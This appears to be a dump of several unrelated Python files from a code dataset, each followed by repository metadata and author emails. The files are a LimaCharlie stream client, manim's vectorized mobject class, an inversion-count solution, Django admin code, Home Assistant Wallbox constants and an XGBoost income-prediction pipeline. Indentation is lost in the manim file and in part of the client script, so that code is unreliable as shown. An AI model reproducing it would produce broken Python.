                            # The output.limacharlie.io service also injects a
                            # few trace messages like keepalives and number of
                            # events dropped (if any) from the server (indicating
                            # we are too slow). We filter those out here.
                            if '__trace' in line:
                                if 'dropped' == line[ '__trace' ]:
                                    self._dropped += int( line[ 'n' ] )
                            else:
                                # Deliver to a registered FutureResults if this
                                # message's investigation_id has one; otherwise
                                # hand it to the consumer-facing queue.
                                future = self._futures.get( line.get( 'routing', {} ).get( 'investigation_id', None ), None )
                                if future is not None:
                                    future[ 0 ]._addNewResult( line )
                                else:
                                    self.queue.put_nowait( line )
                        else:
                            self.queue.put_nowait( line )
                    except:
                        # NOTE(review): bare except -- any per-line failure
                        # (JSON decode error, full queue, ...) is silently
                        # counted as a drop.
                        self._dropped += 1
            except Exception as e:
                if not self._isStop:
                    self._man._printDebug( "Stream closed: %s" % str( e ) )
                else:
                    self._man._printDebug( "Stream closed." )
            finally:
                self._man._printDebug( "Stream closed." )
            if not self._isStop:
                # Reconnect directly to the redirected Spout URL recorded at
                # construction time (avoids re-doing the POST handshake).
                self._hConn = requests.get( self._finalSpoutUrl,
                                            stream = True,
                                            allow_redirects = False,
                                            timeout = _TIMEOUT_SEC )
def _signal_handler():
    # SIGINT handler: shut the active Spout (if any) down cleanly, then exit.
    global sp
    _printToStderr( 'You pressed Ctrl+C!' )
    spout = sp
    if spout is not None:
        spout.shutdown()
    sys.exit( 0 )
def _printToStderr( msg ):
sys.stderr.write( str( msg ) + '\n' )
if __name__ == "__main__":
    # Command-line entry point: open a Spout against limacharlie.io and dump
    # every received message to stdout as pretty-printed JSON; status text
    # goes to stderr so stdout stays machine-readable.
    import argparse
    import getpass
    import uuid
    import gevent
    import signal
    import limacharlie
    sp = None
    # NOTE(review): gevent.signal() as a callable is a legacy alias in newer
    # gevent releases -- confirm the installed gevent version supports it.
    gevent.signal( signal.SIGINT, _signal_handler )
    parser = argparse.ArgumentParser( prog = 'limacharlie.io spout' )
    parser.add_argument( 'data_type',
                         type = str,
                         help = 'the type of data to receive in spout, one of "event", "detect" or "audit".' )
    parser.add_argument( '-o', '--oid',
                         type = lambda x: str( uuid.UUID( x ) ),
                         required = False,
                         dest = 'oid',
                         help = 'the OID to authenticate as, if not specified global creds are used.' )
    parser.add_argument( '-i', '--investigation-id',
                         type = str,
                         dest = 'inv_id',
                         default = None,
                         help = 'spout should only receive events marked with this investigation id.' )
    parser.add_argument( '-t', '--tag',
                         type = str,
                         dest = 'tag',
                         default = None,
                         help = 'spout should only receive events from sensors tagged with this tag.' )
    parser.add_argument( '-c', '--category',
                         type = str,
                         dest = 'cat',
                         default = None,
                         help = 'spout should only receive detections from this category.' )
    parser.add_argument( '-s', '--sid',
                         type = lambda x: str( uuid.UUID( x ) ),
                         dest = 'sid',
                         default = None,
                         help = 'spout should only receive detections or events from this sensor.' )
    args = parser.parse_args()
    # Read the API key interactively so it never lands in shell history.
    secretApiKey = getpass.getpass( prompt = 'Enter secret API key: ' )
    _printToStderr( "Registering..." )
    man = limacharlie.Manager( oid = args.oid, secret_api_key = secretApiKey )
    sp = limacharlie.Spout( man,
                            args.data_type,
                            inv_id = args.inv_id,
                            tag = args.tag,
                            cat = args.cat,
                            sid = args.sid )
    _printToStderr( "Starting to listen..." )
    # Block on the Spout queue forever, printing each message as JSON.
    while True:
        data = sp.queue.get()
        print( json.dumps( data, indent = 2 ) )
_printToStderr( "Exiting." ) | [
"maxime@refractionpoint.com"
] | maxime@refractionpoint.com |
06b102050b963026c4e5184c89d73ea7e22da896 | 4cc16cdcee820f258fcdb7550b853949fc59de46 | /mobject/vectorized_mobject.py | 615e24502c0de9496acb4dcc415c9e2f3a81e407 | [] | no_license | eitanas/manim | c710802ef301b11d0ac6549bb58e04fcc59cc16d | 825ff127a517f35041b2def6efe29a8d6358cd4c | refs/heads/master | 2021-01-22T16:26:09.805304 | 2016-08-15T22:07:28 | 2016-08-15T22:07:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,000 | py | import re
from .mobject import Mobject
from helpers import *
class VMobject(Mobject):
CONFIG = {
"fill_color" : None,
"fill_opacity" : 0.0,
"stroke_color" : None,
#Indicates that it will not be displayed, but
#that it should count in parent mobject's path
"is_subpath" : False,
"close_new_points" : False,
"mark_paths_closed" : False,
"considered_smooth" : True,
"propogate_style_to_family" : False,
}
def __init__(self, *args, **kwargs):
Mobject.__init__(self, *args, **kwargs)
VMobject.init_colors(self)
## Colors
def init_colors(self):
self.set_style_data(
stroke_color = self.stroke_color or self.color,
stroke_width = self.stroke_width,
fill_color = self.fill_color or self.color,
fill_opacity = self.fill_opacity,
family = self.propogate_style_to_family
)
return self
def set_family_attr(self, attr, value):
for mob in self.submobject_family():
setattr(mob, attr, value)
def set_style_data(self,
stroke_color = None,
stroke_width = None,
fill_color = None,
fill_opacity = None,
family = True):
if stroke_color is not None:
self.stroke_rgb = color_to_rgb(stroke_color)
if fill_color is not None:
self.fill_rgb = color_to_rgb(fill_color)
if stroke_width is not None:
self.stroke_width = stroke_width
if fill_opacity is not None:
self.fill_opacity = fill_opacity
if family:
kwargs = locals()
kwargs.pop("self")
for mob in self.submobjects:
mob.set_style_data(**kwargs)
return self
def set_fill(self, color = None, opacity = None, family = True):
probably_meant_to_change_opacity = reduce(op.and_, [
color is not None,
opacity is None,
self.fill_opacity == 0
])
if probably_meant_to_change_opacity:
opacity = 1
return self.set_style_data(
fill_color = color,
fill_opacity = opacity,
family = family
)
def set_stroke(self, color = None, width = None, family = True):
return self.set_style_data(
stroke_color = color,
stroke_width = width,
family = family
)
def highlight(self, color, family = True):
self.set_style_data(
stroke_color = color,
fill_color = color,
family = family
)
return self
# def fade(self, darkness = 0.5):
# Mobject.fade(self, darkness)
# return self
def get_fill_color(self):
try:
self.fill_rgb = np.clip(self.fill_rgb, 0, 1)
return Color(rgb = self.fill_rgb)
except:
return Color(WHITE)
def get_fill_opacity(self):
return self.fill_opacity
def get_stroke_color(self):
try:
self.stroke_rgb = np.clip(self.stroke_rgb, 0, 1)
return Color(rgb = self.stroke_rgb)
except:
return Color(WHITE)
def get_color(self):
if self.fill_opacity == 0:
return self.get_stroke_color()
return self.get_fill_color()
## Drawing
def start_at(self, point):
if len(self.points) == 0:
self.points = np.zeros((1, 3))
self.points[0] = point
return self
def add_control_points(self, control_points):
assert(len(control_points) % 3 == 0)
self.points = np.append(
self.points,
control_points,
axis = 0
)
return self
def is_closed(self):
return is_closed(self.points)
def set_anchors_and_handles(self, anchors, handles1, handles2):
assert(len(anchors) == len(handles1)+1)
assert(len(anchors) == len(handles2)+1)
total_len = 3*(len(anchors)-1) + 1
self.points = np.zeros((total_len, self.dim))
self.points[0] = anchors[0]
arrays = [handles1, handles2, anchors[1:]]
for index, array in enumerate(arrays):
self.points[index+1::3] = array
return self.points
def set_points_as_corners(self, points):
if len(points) <= 1:
return self
points = np.array(points)
self.set_anchors_and_handles(points, *[
interpolate(points[:-1], points[1:], alpha)
for alpha in 1./3, 2./3
])
return self
def set_points_smoothly(self, points):
if len(points) <= 1:
return self
h1, h2 = get_smooth_handle_points(points)
self.set_anchors_and_handles(points, h1, h2)
return self
def set_points(self, points):
self.points = np.array(points)
return self
def set_anchor_points(self, points, mode = "smooth"):
if not isinstance(points, np.ndarray):
points = np.array(points)
if self.close_new_points and not is_closed(points):
points = np.append(points, [points[0]], axis = 0)
if mode == "smooth":
self.set_points_smoothly(points)
elif mode == "corners":
self.set_points_as_corners(points)
else:
raise Exception("Unknown mode")
return self
def change_anchor_mode(self, mode):
anchors, h1, h2 = self.get_anchors_and_handles()
self.set_anchor_points(anchors, mode = mode)
return self
def make_smooth(self):
self.considered_smooth = True
return self.change_anchor_mode("smooth")
def make_jagged(self):
return self.change_anchor_mode("corners")
def add_subpath(self, points):
"""
A VMobject is meant to represnt
a single "path", in the svg sense of the word.
However, one such path may really consit of separate
continuous components if there is a move_to command.
These other portions of the path will be treated as submobjects,
but will be tracked in a separate special list for when
it comes time to display.
"""
subpath_mobject = self.copy()#TODO, better way?
subpath_mobject.is_subpath = True
subpath_mobject.set_points(points)
self.add(subpath_mobject)
return subpath_mobject
def get_subpath_mobjects(self):
return filter(
lambda m : m.is_subpath,
self.submobjects
)
def apply_function(self, function, maintain_smoothness = True):
Mobject.apply_function(self, function)
if maintain_smoothness and self.considered_smooth:
self.make_smooth()
return self
## Information about line
def component_curves(self):
for n in range(self.get_num_anchor_points()-1):
yield self.get_nth_curve(n)
def get_nth_curve(self, n):
return bezier(self.points[3*n:3*n+4])
def get_num_anchor_points(self):
return (len(self.points) - 1)/3 + 1
def point_from_proportion(self, alpha):
num_cubics = self.get_num_anchor_points()-1
interpoint_alpha = num_cubics*(alpha % (1./num_cubics))
index = 3*int(alpha*num_cubics)
cubic = bezier(self.points[index:index+4])
return cubic(interpoint_alpha)
def get_anchors_and_handles(self):
return [
self.points[i::3]
for i in range(3)
]
## Alignment
def align_points(self, mobject):
Mobject.align_points(self, mobject)
is_subpath = self.is_subpath or mobject.is_subpath
self.is_subpath = mobject.is_subpath = is_subpath
mark_closed = self.mark_paths_closed and mobject.mark_paths_closed
self.mark_paths_closed = mobject.mark_paths_closed = mark_closed
return self
def align_points_with_larger(self, larger_mobject):
assert(isinstance(larger_mobject, VMobject))
self.insert_n_anchor_points(
larger_mobject.get_num_anchor_points()-\
self.get_num_anchor_points()
)
return self
def insert_n_anchor_points(self, n):
curr = self.get_num_anchor_points()
if curr == 0:
self.points = np.zeros((1, 3))
n = n-1
if curr == 1:
self.points = np.repeat(self.points, 3*n+1, axis = 0)
return self
points = np.array([self.points[0]])
num_curves = curr-1
#Curves in self are buckets, and we need to know
#how many new anchor points to put into each one.
#Each element of index_allocation is like a bucket,
#and its value tells you the appropriate index of
#the smaller curve.
index_allocation = (np.arange(curr+n-1) * num_curves)/(curr+n-1)
for index in range(num_curves):
curr_bezier_points = self.points[3*index:3*index+4]
num_inter_curves = sum(index_allocation == index)
alphas = np.arange(0, num_inter_curves+1)/float(num_inter_curves)
for a, b in zip(alphas, alphas[1:]):
new_points = partial_bezier_points(
curr_bezier_points, a, b
)
points = np.append(
points, new_points[1:], axis = 0
)
self.set_points(points)
return self
def get_point_mobject(self, center = None):
if center is None:
center = self.get_center()
return VectorizedPoint(center)
def repeat_submobject(self, submobject):
if submobject.is_subpath:
return VectorizedPoint(submobject.points[0])
return submobject.copy()
def interpolate_color(self, mobject1, mobject2, alpha):
attrs = [
"stroke_rgb",
"stroke_width",
"fill_rgb",
"fill_opacity",
]
for attr in attrs:
setattr(self, attr, interpolate(
getattr(mobject1, attr),
getattr(mobject2, attr),
alpha
))
if alpha == 1.0:
# print getattr(mobject2, attr)
setattr(self, attr, getattr(mobject2, attr))
def pointwise_become_partial(self, mobject, a, b):
assert(isinstance(mobject, VMobject))
#Partial curve includes three portions:
#-A middle section, which matches the curve exactly
#-A start, which is some ending portion of an inner cubic
#-An end, which is the starting portion of a later inner cubic
if a <= 0 and b >= 1:
self.set_points(mobject.points)
self.mark_paths_closed = mobject.mark_paths_closed
return self
self.mark_paths_closed = False
num_cubics = mobject.get_num_anchor_points()-1
lower_index = int(a*num_cubics)
upper_index = int(b*num_cubics)
points = np.array(
mobject.points[3*lower_index:3*upper_index+4]
)
if len(points) > 1:
a_residue = (num_cubics*a)%1
b_residue = (num_cubics*b)%1
points[:4] = partial_bezier_points(
points[:4], a_residue, 1
)
points[-4:] = partial_bezier_points(
points[-4:], 0, b_residue
)
self.set_points(points)
return self
class VectorizedPoint(VMobject):
    # A zero-size VMobject consisting of a single point; used as a
    # placeholder (e.g. when collapsing a mobject down to a point).
    CONFIG = {
        "color" : BLACK,
        "artificial_width" : 0.01,
        "artificial_height" : 0.01,
    }
    def __init__(self, location = ORIGIN, **kwargs):
        VMobject.__init__(self, **kwargs)
        self.set_points(np.array([location]))
    def get_width(self):
        # Report a tiny nonzero width so layout code that divides by
        # width/height never hits zero.
        return self.artificial_width
    def get_height(self):
        return self.artificial_height
| [
"grantsanderson7@gmail.com"
] | grantsanderson7@gmail.com |
6f37e652c5ee9b68c1579f12e147989fb8c2cbd4 | c8fab9ceda9a5882584d9944a91c84a1828e1d8b | /code/35.数组中的逆序对.py | 4396b2143041b5024aa2e6b5cae176862168b323 | [] | no_license | Confucius-hui/Sword-to-office | 7683bdb3037b711181e78aec5a16c9dbfa1c34d9 | 0a018c77e7faa89ad3f1daa87cee31d2b539e082 | refs/heads/master | 2020-04-08T07:58:10.713008 | 2019-06-20T08:38:03 | 2019-06-20T08:38:03 | 159,159,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,555 | py | '''
在数组中的两个数字,如果前面一个数字大于后面的数字,则这两个数字组成一个逆序对。
输入一个数组,求出这个数组中的逆序对的总数P。
并将P对1000000007取模的结果输出。 即输出P%1000000007
'''
# -*- coding:utf-8 -*-
class Solution:
    """Count inversion pairs (i < j with data[i] > data[j]) in an array.

    Per the problem statement at the top of this file, the count P is
    returned modulo 1000000007.
    """
    def InversePairs1(self, data):
        """Brute-force O(n^2) inversion count (kept for cross-checking)."""
        length = len(data)
        count = 0
        for i in range(length):
            for j in range(i+1, length):
                if data[i] > data[j]:
                    count += 1
        return count % 1000000007
    def InversePairs(self, data):
        """Merge-sort based O(n log n) inversion count, mod 1000000007."""
        if not data:
            # Guard: merge_sort would recurse forever on an empty list
            # (len 0 never reaches the len == 1 base case).
            return 0
        data, count = self.merge_sort(data)
        return count % 1000000007
    def merge_sort(self, array):
        """Sort array, returning (sorted_array, inversion_count)."""
        if len(array) <= 1:
            return array, 0
        mid = len(array)//2
        left, count1 = self.merge_sort(array[:mid])
        right, count2 = self.merge_sort(array[mid:])
        return self.merge(left, right, count1+count2)
    def merge(self, left, right, count):
        """Merge two sorted runs, adding cross-run inversions to count."""
        i, j = 0, 0
        result = []
        while i < len(left) and j < len(right):
            if left[i] <= right[j]:
                result.append(left[i])
                i += 1
            else:
                # Every element still pending in left inverts with right[j].
                count += (len(left)-i)
                result.append(right[j])
                j += 1
        result.extend(left[i:])
        result.extend(right[j:])
        return result, count
def test_function():
    """Smoke test: run both inversion counters on a small sample."""
    sample = [1, 2, 9, 0]
    solver = Solution()
    brute_force_count = solver.InversePairs1(sample)
    print(brute_force_count)
    print(solver.InversePairs(sample))
# Run the smoke test when executed directly as a script.
if __name__ == '__main__':
    test_function()
"1034243218@qq.com"
] | 1034243218@qq.com |
dbf025d7bcfc7df0a48718eccc0b0cb14810a02c | c2f35e5d3cfbbb73188a0cd6c43d161738e63bd1 | /12-Django框架学习/bj18/test2/booktest/admin.py | e10072641c8350576c99bd572fcb82581b21d2f6 | [] | no_license | yangh-zzf-itcast/Python_heima_Study | 2a7cd0d801d9d6f49548905d373bb409efc4b559 | 7d753c1cdd5c46a0e78032e12b1d2f5d9be0bf68 | refs/heads/master | 2020-04-30T06:59:04.000451 | 2019-04-19T12:15:30 | 2019-04-19T12:15:30 | 176,670,172 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from django.contrib import admin
from booktest.models import BookInfo, HeroInfo
# Register your models here.
# 注册模型类
admin.site.register(BookInfo)
admin.site.register(HeroInfo)
| [
"2459846416@qq.com"
] | 2459846416@qq.com |
c181290b15d6ff56e69337cc726815e6b271b393 | 2bcbf097c6f99a2ea30269bcab2420e9c7f08b67 | /homeassistant/components/wallbox/const.py | 62c9b2f6efdc0323ce964f2ff95c285d9867164d | [
"Apache-2.0"
] | permissive | yozik04/core | fe8fe96ac91ff18f2631ea40786e3b413dee839d | 3374005b336284730209c571240039683cf662bf | refs/heads/dev | 2023-03-06T02:28:28.520609 | 2021-10-30T17:18:39 | 2021-10-30T17:18:39 | 245,432,602 | 0 | 0 | Apache-2.0 | 2023-02-22T06:16:08 | 2020-03-06T13:54:31 | Python | UTF-8 | Python | false | false | 3,655 | py | """Constants for the Wallbox integration."""
from homeassistant.const import (
CONF_DEVICE_CLASS,
CONF_ICON,
CONF_NAME,
CONF_UNIT_OF_MEASUREMENT,
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_CURRENT,
DEVICE_CLASS_ENERGY,
DEVICE_CLASS_POWER,
ELECTRIC_CURRENT_AMPERE,
ENERGY_KILO_WATT_HOUR,
LENGTH_KILOMETERS,
PERCENTAGE,
POWER_KILO_WATT,
)
DOMAIN = "wallbox"
CONF_STATION = "station"
# Keys under which the Wallbox API reports each charger datum.
CONF_ADDED_ENERGY_KEY = "added_energy"
CONF_ADDED_RANGE_KEY = "added_range"
CONF_CHARGING_POWER_KEY = "charging_power"
CONF_CHARGING_SPEED_KEY = "charging_speed"
CONF_CHARGING_TIME_KEY = "charging_time"
CONF_COST_KEY = "cost"
CONF_CURRENT_MODE_KEY = "current_mode"
CONF_DATA_KEY = "config_data"
CONF_DEPOT_PRICE_KEY = "depot_price"
CONF_MAX_AVAILABLE_POWER_KEY = "max_available_power"
CONF_MAX_CHARGING_CURRENT_KEY = "max_charging_current"
CONF_STATE_OF_CHARGE_KEY = "state_of_charge"
CONF_STATUS_DESCRIPTION_KEY = "status_description"
CONF_CONNECTIONS = "connections"
CONF_ROUND = "round"


def _sensor_description(icon, name, rounding, unit, device_class):
    """Return the display-metadata mapping for one Wallbox sensor."""
    return {
        CONF_ICON: icon,
        CONF_NAME: name,
        CONF_ROUND: rounding,
        CONF_UNIT_OF_MEASUREMENT: unit,
        CONF_DEVICE_CLASS: device_class,
    }


# Per-sensor display metadata, keyed by the API data key above.
CONF_SENSOR_TYPES = {
    CONF_CHARGING_POWER_KEY: _sensor_description(
        None, "Charging Power", 2, POWER_KILO_WATT, DEVICE_CLASS_POWER
    ),
    CONF_MAX_AVAILABLE_POWER_KEY: _sensor_description(
        None, "Max Available Power", 0, ELECTRIC_CURRENT_AMPERE, DEVICE_CLASS_CURRENT
    ),
    CONF_CHARGING_SPEED_KEY: _sensor_description(
        "mdi:speedometer", "Charging Speed", 0, None, None
    ),
    CONF_ADDED_RANGE_KEY: _sensor_description(
        "mdi:map-marker-distance", "Added Range", 0, LENGTH_KILOMETERS, None
    ),
    CONF_ADDED_ENERGY_KEY: _sensor_description(
        None, "Added Energy", 2, ENERGY_KILO_WATT_HOUR, DEVICE_CLASS_ENERGY
    ),
    CONF_CHARGING_TIME_KEY: _sensor_description(
        "mdi:timer", "Charging Time", None, None, None
    ),
    CONF_COST_KEY: _sensor_description("mdi:ev-station", "Cost", None, None, None),
    CONF_STATE_OF_CHARGE_KEY: _sensor_description(
        None, "State of Charge", None, PERCENTAGE, DEVICE_CLASS_BATTERY
    ),
    CONF_CURRENT_MODE_KEY: _sensor_description(
        "mdi:ev-station", "Current Mode", None, None, None
    ),
    CONF_DEPOT_PRICE_KEY: _sensor_description(
        "mdi:ev-station", "Depot Price", 2, None, None
    ),
    CONF_STATUS_DESCRIPTION_KEY: _sensor_description(
        "mdi:ev-station", "Status Description", None, None, None
    ),
    CONF_MAX_CHARGING_CURRENT_KEY: _sensor_description(
        None, "Max. Charging Current", None, ELECTRIC_CURRENT_AMPERE, DEVICE_CLASS_CURRENT
    ),
}
| [
"noreply@github.com"
] | noreply@github.com |
2390b2d58a1a06651ea1b46e681dc0a4a1d5453d | 1317129f0bc7d5c87aadba09b9ebe3e2c9613357 | /modelling.py | 679190f47d1c2b235df89a292fa6d22598f6a6b5 | [] | no_license | aaqib-ali/Income_prediction | 9dcecfcf73ff3b3a6c9608d573663ba7b8ff4f16 | f420ead78b7684e723f7801d6c7f47c1bae1aaa7 | refs/heads/main | 2023-04-09T20:27:12.999711 | 2021-04-16T09:02:28 | 2021-04-16T09:02:28 | 346,493,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,089 | py | import time
import os
import pandas as pd
from collections import Counter
import seaborn as sns
import utils.helper_exploration as exploration
from sklearn.preprocessing import OneHotEncoder, StandardScaler
from sklearn.compose import make_column_transformer, ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.metrics import roc_auc_score
from sklearn.metrics import classification_report, confusion_matrix
# sklearn classifiers
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.feature_selection import SelectFromModel
from xgboost import XGBClassifier
# from this project
import utils.helper_models as helper_models
class Modelling:
    """Trains a classifier on the prepared feature/target frame and saves
    evaluation artifacts (confusion matrix, ROC curve, feature importance).
    """
    def modelling(self, df_features_target):
        """Fit the selected model pipeline on df_features_target and persist
        the fitted pipeline plus performance plots under ./results.

        Args:
            df_features_target: dataframe holding both the feature columns
                and the target column named by the feature-config helpers.
        """
        print('Start Modelling:')
        # The model is selected by (un)commenting one of these names.
        #model_name = 'LogisticRegression'
        #model_name = 'SGDClassifier'
        #model_name = 'RandomForest'
        model_name = 'XgBoost'
        # Checking missing values before model implementation
        data_check = helper_models.missing_values_table(df_features_target)
        print('Missing values in a column with the percentage', data_check)
        # Split the data into train and Test
        train_data_df, test_data_df = helper_models.split_dataset(df_features_target)
        categorical_features, numeric_features, target_name = helper_models.read_features_name()
        #train_data_df = helper_models.donwsample_trainset(train_data_df, target_name, 1234)
        params = helper_models.read_parameters(model_name)
        # NOTE(review): unpacking a dict as positional args prints only its
        # keys -- presumably meant to display the hyper-parameters; verify.
        print(*params)
        #classifier = LogisticRegression(**params)
        #classifier = SGDClassifier(**params)
        #classifier = RandomForestClassifier(**params)
        classifier = XGBClassifier(**params)
        print('XGBoost is Initialized')
        #Build Model pipeline
        # One-hot encode categoricals, standard-scale numerics, then classify.
        categorical_pipe = Pipeline([
            ('onehot', OneHotEncoder(handle_unknown='ignore'))
        ])
        numerical_pipe = Pipeline([
            ('Scaler', StandardScaler())
        ])
        preprocessing = ColumnTransformer(
            [('cat', categorical_pipe, categorical_features),
             ('num', numerical_pipe, numeric_features)])
        model_pipeline = Pipeline([
            ('preprocess', preprocessing),
            ('classifier', classifier)])
        # Class-balance overview for the full / train / test splits.
        print('Total Targets shape %s' % Counter(df_features_target[target_name]))
        print('Train Targets shape %s' % Counter(train_data_df[target_name]))
        print('Test Targets shape %s' % Counter(test_data_df[target_name]))
        # fit the model
        model_pipeline.fit(train_data_df.drop(columns=target_name), train_data_df[target_name])
        helper_models.save_pipeline(model_pipeline)
        #'''
        # Evaluate on the held-out split and save performance artifacts.
        prediction = model_pipeline.predict(test_data_df.drop(columns=target_name))
        probability = model_pipeline.predict_proba(test_data_df.drop(columns=target_name))
        print("Classification report", classification_report(test_data_df[target_name], prediction))
        helper_models.fill_confusion_matrix_and_save(test_data_df[target_name],
                                                     prediction,f_name='Confusion matrix '+
                                                     str(model_name), out_dir='./results/Model_performance')
        helper_models.plot_roc_curve_and_save(test_data_df[target_name],
                                              probability, f_name='Roc Curve '+
                                              str(model_name),out_dir='./results/Model_performance')
        helper_models.plot_feature_importance_and_save(model_pipeline, categorical_features,
                                                       numeric_features, top_num=10,
                                                       f_name='Random Forest Classifier Feature Importance',
                                                       out_dir='./results/Model_performance')
        #'''
| [
"aaqib_ali90@protonmail.com"
] | aaqib_ali90@protonmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.